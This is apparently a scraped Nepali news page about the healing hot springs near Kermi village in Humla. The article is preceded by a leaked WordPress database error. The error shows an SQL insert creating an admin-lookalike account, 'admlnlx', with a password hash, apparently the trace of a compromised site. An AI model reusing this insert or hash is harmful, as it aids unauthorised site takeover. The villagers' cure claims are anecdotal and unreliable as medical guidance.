WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BVcD8StF3zetq77n1uA7SN/5SJGmsM.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 04:53:58', '', 'admlnlx', 'admlnlx')
कचहरी डट कम, हुम्ला ।।
खगालागाउँ गाविसको केर्मी गाउँमा रहेको तातोपानीको कुवा अर्थात् तप्पनहरुमा हरेक वर्ष हुम्लाका विभिन्न गाउँहरुबाट वर्षको दुई पटक बैसाख जेठ महिना र कात्तिक मंसिर महिनामा तप्पन जाने चलन छ । तप्पनमा गएर विभिन्न प्रकारका छाला, पेट, टाउँको, हातखुट्टा, हाडजोर्नी तथा अन्य रोगहरुको उपचार हुने कुरा स्थानीयबासीहरु वताउँछन् ।
केर्मी गाउँबाट करीब पाँच सय मिटर पर्वूतिर रहेको तप्पन खोलाको विभिन्न ठाउँमा धेरै तातोपानीका कुवाहरु रहेका छन् भने यी विभिन्न तप्पनहरुमा विभिन्न प्रकारका रसायनहरुको गन्ध आउने भएकोले यहाँको तातोपानीमा करीब एक सातासम्म दिनको दुई पटक नुहाई आराम गरेमा विभिन्न प्रकारका रोगहरु निको हुने कुरा स्याँडा गाउँका चक्र बुढाको अनुभव रहेको छ